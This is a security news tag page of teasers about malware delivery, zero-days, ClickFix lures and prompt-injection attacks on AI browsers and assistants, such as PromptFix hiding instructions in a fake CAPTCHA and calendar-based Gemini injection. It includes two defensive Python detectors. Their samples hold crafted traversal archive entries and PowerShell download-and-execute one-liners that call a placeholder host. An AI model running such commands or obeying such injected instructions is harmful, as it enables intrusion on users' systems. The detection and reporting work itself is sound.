Tag: malicious
-
Malware Delivery Shifts: Malicious URLs Surpass Attachments as Top Threat Vector
Cyber attackers have changed their tactics. According to a recent ITPro report, malicious URLs are now four times more common than infected email attachments when it comes to delivering malware. This shift has serious implications for defenders, especially as phishing techniques evolve to exploit trust and emerging communication channels. The Rise of Link-Based Attacks In…
-
UNC5518 Group Hacks Legitimate Sites with Fake Captcha to Deliver Malware
The financially motivated threat group UNC5518 has been compromising legitimate websites to plant ClickFix lures, fake CAPTCHA pages that trick visitors into running a downloader script, in a campaign tracked since June 2024. The resulting infection chains often end in malware deployed by affiliated…
-
Apple Confirms Critical 0-Day Under Active Attack Immediate Update Urged
Apple has issued an emergency security update for iOS 18.6.2 and iPadOS 18.6.2 to address a critical zero-day vulnerability that the company confirms is being actively exploited in sophisticated attacks against targeted individuals. The update, released on August 20, 2025, patches a severe flaw in the ImageIO component that could allow attackers to execute malicious…
-
Apple Patches CVE-2025-43300 Zero-Day in iOS, iPadOS, and macOS Exploited in Targeted Attacks
Apple has released security updates to address a security flaw impacting iOS, iPadOS, and macOS that it said has come under active exploitation in the wild. The zero-day, an out-of-bounds write vulnerability tracked as CVE-2025-43300, resides in the ImageIO framework and could result in memory corruption when processing a malicious image. “Apple is aware of a report that…
-
PromptFix Exploit Forces AI Browsers to Execute Hidden Malicious Commands
Cybersecurity researchers have uncovered critical vulnerabilities in AI-powered browsers that allow attackers to manipulate artificial intelligence agents into executing malicious commands without user knowledge, introducing what experts are calling a new era of “Scamlexity”…
-
Gemini AI Vulnerable to Calendar-Based Hack: What is Google’s Mitigation Approach?
Hidden prompts in Google Calendar events can trick Gemini AI into executing malicious commands via indirect prompt injection. First seen on techrepublic.com Jump to article: www.techrepublic.com/article/news-google-gemini-indirect-prompt-injection-attack/
-
WinRAR Zero-Day Exploited by Russian-Linked Hackers RomCom and Paper Werewolf
Older WinRAR versions let a crafted archive override the user-specified extraction path, so extracted files land where the attacker chooses rather than in the chosen folder, enabling stealthy system compromise. First seen on techrepublic.com Jump to article: www.techrepublic.com/article/news-winrar-zero-day-hackers-romcom-paper-werewolf/
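The class of flaw described in the WinRAR entry, an archive member whose stored path is honoured instead of the directory the user chose, can be screened for before extraction. The block below is an added example written for this page, not WinRAR's or the researchers' code; it uses a zip archive built in memory as a stand-in for a crafted RAR (the Python standard library cannot write RAR), and the extraction directory /tmp/extract is a placeholder. The path check itself is format-agnostic.

```python
"""Archive entries that would escape the user-chosen extraction directory.

Added example for this page, not WinRAR's code. A zip built in memory stands
in for a crafted RAR; the check does not depend on the archive format.
"""
import io
import posixpath
import zipfile


def escapes_target(entry_name: str, target_dir: str = "/tmp/extract") -> bool:
    """True if extracting entry_name under target_dir would write outside it."""
    target = posixpath.normpath(target_dir)
    # Windows extractors accept backslashes as separators; normalise first.
    name = entry_name.replace("\\", "/")
    # Absolute paths, drive letters (C:/...) and NTFS alternate data streams
    # (file.txt:stream) all bypass the directory the user picked.
    if name.startswith("/") or ":" in name:
        return True
    resolved = posixpath.normpath(posixpath.join(target, name))
    return resolved != target and not resolved.startswith(target + "/")


def suspicious_entries(archive_bytes: bytes, target_dir: str = "/tmp/extract") -> list:
    """Names of archive members that should be refused before extraction."""
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        return [n for n in zf.namelist() if escapes_target(n, target_dir)]


def build_sample_archive() -> bytes:
    """Constructed sample: benign documents plus crafted traversal entries."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("report.pdf", b"benign content")
        zf.writestr("docs/../report.txt", b"benign: stays inside after normalisation")
        # Each of the following resolves outside /tmp/extract (placeholder paths).
        zf.writestr("../../Users/Public/Start Menu/Programs/Startup/update.exe", b"MZ")
        zf.writestr("..\\..\\AppData\\Roaming\\update.exe", b"MZ")
        zf.writestr("C:/Windows/Temp/update.exe", b"MZ")
        zf.writestr("notes.txt:hidden", b"payload in an alternate data stream")
    return buf.getvalue()


if __name__ == "__main__":
    for name in suspicious_entries(build_sample_archive()):
        print("refuse:", name)
```

The check runs over the member list before any byte is written, which is the point: an extractor that normalises paths only after opening the output file has already lost. A startup-folder path is used in the sample because dropping an executable there is the obvious way to turn a path override into code execution at next logon.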
-
AI website builder Lovable increasingly abused for malicious activity
Cybercriminals are increasingly abusing the AI-powered Lovable website creation and hosting platform to generate phishing pages, malware-dropping portals, and various fraudulent websites. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/ai-website-builder-lovable-increasingly-abused-for-malicious-activity/
-
Cybercriminals Abuse Vibe Coding Service to Create Malicious Sites
Some LLM-created scripts and emails can lower the barrier of entry for low-skill attackers, who can use services like Lovable to create convincing, effective websites in minutes. First seen on darkreading.com Jump to article: www.darkreading.com/cyberattacks-data-breaches/cybercriminals-abuse-vibe-coding-service-malicious-sites
-
Perplexity’s Comet AI browser tricked into buying fake items online
A study looking into agentic AI browsers has found that these emerging tools are vulnerable to both new and old schemes that could make them interact with malicious pages and prompts. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/perplexitys-comet-ai-browser-tricked-into-buying-fake-items-online/
-
QuirkyLoader: A New Malware Loader Spreading Infostealers and Remote Access Trojans (RATs)
IBM X-Force has tracked QuirkyLoader, a sophisticated loader malware deployed by threat actors to distribute prominent families such as Agent Tesla, AsyncRAT, FormBook, MassLogger, Remcos, Rhadamanthys, and Snake Keylogger. This multi-stage threat initiates through spam emails from legitimate providers or self-hosted servers, attaching malicious archives containing a legitimate executable, an encrypted payload masquerading as a…
-
Signed, Sealed, and Delivered: The Case for Authenticating AI Agents
As agentic AI blends into malicious traffic, authenticating AI agents with cryptographic signatures is becoming the only scalable way to separate trusted bots from imposters. First seen on securityboulevard.com Jump to article: securityboulevard.com/2025/08/signed-sealed-and-delivered-the-case-for-authenticating-ai-agents/
-
Experts Find AI Browsers Can Be Tricked by PromptFix Exploit to Run Malicious Hidden Prompts
Cybersecurity researchers have demonstrated a new prompt injection technique called PromptFix that tricks a generative artificial intelligence (GenAI) model into carrying out intended actions by embedding the malicious instruction inside a fake CAPTCHA check on a web page. Described by Guardio Labs as an “AI-era take on the ClickFix scam,” the attack technique demonstrates how AI-driven browsers,…
-
Hackers Weaponize QR Codes in New ‘Quishing’ Attacks
Researchers discovered two new phishing techniques where attackers split malicious QR codes or embed them into legitimate ones. First seen on infosecurity-magazine.com Jump to article: www.infosecurity-magazine.com/news/hackers-qr-codes-new-quishing/
-
Lenovo AI Chatbot Flaw Allows Remote Script Execution on Corporate Systems
Cybersecurity researchers have uncovered critical vulnerabilities in Lenovo’s AI-powered customer support chatbot that could allow attackers to execute malicious scripts on corporate systems and steal sensitive session data. The discovery highlights significant security gaps in enterprise AI implementations and raises concerns about the rapid deployment of AI systems without adequate security controls. Cybernews Researchers identified…
-
New GodRAT Malware Uses Screensaver and Program Files to Target Organizations
Threat actors have been deploying a novel Remote Access Trojan (RAT) dubbed GodRAT, derived from the venerable Gh0st RAT codebase, to infiltrate financial institutions, particularly trading and brokerage firms. The malware is distributed via Skype as malicious .scr (screensaver) and .pif (Program Information File) executables masquerading as legitimate financial documents, such as client lists or…
-
New ClickFix Attack Deploys Fake BBC News Page and Fake Cloudflare Verification to Deceive Users
Cybersecurity researchers have uncovered a novel ClickFix attack variant that impersonates trusted BBC news content while leveraging counterfeit Cloudflare Turnstile verification interfaces to coerce users into executing malicious PowerShell commands. This campaign, detailed in recent analyses from sources like Cybersecurity News and ESET, exploits user familiarity with legitimate web security protocols to deliver a range…
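The ClickFix entries on this page (the UNC5518 campaign, the PromptFix variant and this BBC/Cloudflare lure) share one endpoint artefact: the victim pastes an attacker-supplied command into the Run dialog or a terminal, so PowerShell starts with explorer.exe as its parent and a download-and-execute command line, often with the "verification" wording still attached as a comment. The detector below is an added example written for this page, not code from ESET, Guardio or the other cited researchers. The event records are constructed in a simplified Sysmon process-creation style (the field names ParentImage, Image and CommandLine are assumed, not taken from the page), the URLs are placeholders, and the indicator combination used as the alert threshold is the editor's heuristic.

```python
"""Heuristic ClickFix detector over process-creation events.

Added example for this page (not the cited researchers' code). Field names
mirror Sysmon Event ID 1, but the records are constructed, not real telemetry.
"""
import base64
import re

# Download cradles and execution primitives typical of pasted one-liners.
CRADLE_RE = re.compile(
    r"(invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring|"
    r"net\.webclient|\bcurl\b|bitsadmin|\bmshta\b)", re.I)
EXEC_RE = re.compile(r"(invoke-expression|\biex\b)", re.I)
HIDDEN_RE = re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I)
ENCODED_RE = re.compile(r"-e(nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)
# ClickFix pages present the pasted text as a CAPTCHA/verification step and
# that wording frequently survives as a trailing comment in the command line.
LURE_RE = re.compile(r"(not a robot|verification|captcha)", re.I)


def decode_encoded_command(cmdline: str):
    """Plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(2)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def clickfix_indicators(event: dict) -> list:
    """List the ClickFix-style indicators present in one process-creation event."""
    cmd = event.get("CommandLine", "")
    text = cmd
    reasons = []
    decoded = decode_encoded_command(cmd)
    if decoded:
        reasons.append("encoded_command")
        text += " " + decoded  # scan the decoded payload as well
    parent = event.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    if parent == "explorer.exe":  # Win+R launches have explorer.exe as parent
        reasons.append("launched_from_run_dialog")
    if CRADLE_RE.search(text):
        reasons.append("download_cradle")
    if EXEC_RE.search(text):
        reasons.append("invoke_expression")
    if HIDDEN_RE.search(text):
        reasons.append("hidden_window")
    if LURE_RE.search(text):
        reasons.append("verification_lure_text")
    return reasons


def is_clickfix(event: dict) -> bool:
    """Alert when a fetch primitive is paired with at least one more indicator.

    A lone download cradle is routine admin/developer activity; combined with
    a Run-dialog parent, a hidden window, IEX or lure text it is not.
    """
    r = clickfix_indicators(event)
    return len(r) >= 2 and ("download_cradle" in r or "encoded_command" in r)


# Constructed sample events (placeholder hosts, not real telemetry).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ENCODED = base64.b64encode(
    "iex (irm https://example.invalid/p)".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS,
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": 'powershell -w hidden -c "iwr -useb https://example.invalid/v | iex" '
                    '# I am not a robot - Verification ID: 1234'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell -e " + ENCODED},
    {"ParentImage": r"C:\Program Files\WindowsApps\WindowsTerminal.exe", "Image": PS,
     "CommandLine": 'powershell -c "iwr https://example.invalid/tool.zip -OutFile tool.zip"'},
]


def run_detection(events=SAMPLE_EVENTS) -> list:
    """Indices of events that trip the detector, with their indicators."""
    return [(i, clickfix_indicators(e)) for i, e in enumerate(events) if is_clickfix(e)]


if __name__ == "__main__":
    for i, reasons in run_detection():
        print(f"event {i}: ClickFix suspected ({', '.join(reasons)})")
```

Of the four constructed events only the two explorer.exe-parented ones alert: the scheduled backup script has no indicators and the developer's one-off download has only the cradle, which is why the threshold requires a second signal. In production the same logic would also want the RunMRU registry value and clipboard telemetry, but the command line alone already separates these cases.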
-
New GodRAT Trojan Targets Trading Firms Using Steganography and Gh0st RAT Code
Financial institutions like trading and brokerage firms are the target of a new campaign that delivers a previously unreported remote access trojan called GodRAT. The malicious activity involves the “distribution of malicious .SCR (screen saver) files disguised as financial documents via Skype messenger,” Kaspersky researcher Saurabh Sharma said in a technical analysis published today. The…
-
Surge in Scans From Hacked Cisco, Linksys, and Araknis Routers
Cybersecurity researchers have identified a significant increase in malicious scanning activities originating from compromised consumer and enterprise networking equipment, with particular focus on Cisco, Linksys, and Araknis router models. The Shadowserver Foundation, a prominent threat intelligence organization, has reported observing unusual scanning patterns that suggest widespread compromise of these networking devices. Security analysts are tracking…
-
Cooking with Code: A DevOps Kitchen Secured by Thales
Tags: access, ai, api, cctv, cloud, compliance, control, data, encryption, GDPR, identity, infrastructure, injection, least-privilege, malicious, mfa, military, monitoring, PCI, service, software, strategy, tool, waf, zero-day, zero-trust
madhav, Tue, 08/19/2025 – 05:13
In today’s hyperconnected digital world, deploying applications is a lot like running a high-performance, Michelin-star kitchen. You need the right setup, a disciplined process, and seamless coordination, where every tool, role, and task moves in harmony, executed flawlessly. Speed and precision…
-
Singapore issues critical alert on Dire Wolf ransomware targeting global tech and manufacturing firms
Tags: attack, authentication, backup, business, compliance, control, credentials, cyber, data, defense, email, endpoint, extortion, insurance, intelligence, leak, malicious, mfa, msp, network, phishing, ransom, ransomware, resilience, risk, supply-chain, threat, update
Ripple effects on global enterprises: The global business fallout of Dire Wolf ransomware attacks is significant and poses a multi-layered, high-impact threat to global enterprises. “Its attacks directly disrupt operations and supply chains, particularly in manufacturing and tech, leading to production delays, revenue loss, and downstream customer impact,” said Manish Rawat, analyst at TechInsights. “Financial impact…
-
The Hidden Risks of External AI Models and How Businesses can Mitigate Them
As AI adoption accelerates, businesses face hidden risks from third-party models like ChatGPT and Claude, including data leakage and malicious data infiltration. By implementing corporate AI tools and educating employees, companies can harness generative AI’s benefits while safeguarding sensitive data, compliance, and trust. First seen on securityboulevard.com Jump to article: securityboulevard.com/2025/08/the-hidden-risks-of-external-ai-models-and-how-businesses-can-mitigate-them/
-
XenoRAT malware campaign hits multiple embassies in South Korea
A state-sponsored espionage campaign is targeting foreign embassies in South Korea to deploy XenoRAT malware from malicious GitHub repositories. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/xenorat-malware-campaign-hits-multiple-embassies-in-south-korea/
-
Malicious npm Packages Target Crypto Developers to Steal Login Credentials
A sophisticated threat campaign dubbed “Solana-Scan”… “cryptohan”…
-
New Sni5Gect Attack Targets 5G to Steal Messages and Inject Payloads
Tags: 5G, attack, communications, cyber, cybersecurity, framework, infrastructure, malicious, technology, vulnerability
Cybersecurity researchers at Singapore University of Technology and Design have unveiled a sophisticated new attack framework called SNI5GECT that can intercept 5G communications and inject malicious payloads without requiring a rogue base station. The research demonstrates significant vulnerabilities in the current 5G infrastructure that could allow attackers to crash devices, downgrade connections, and steal user identities from…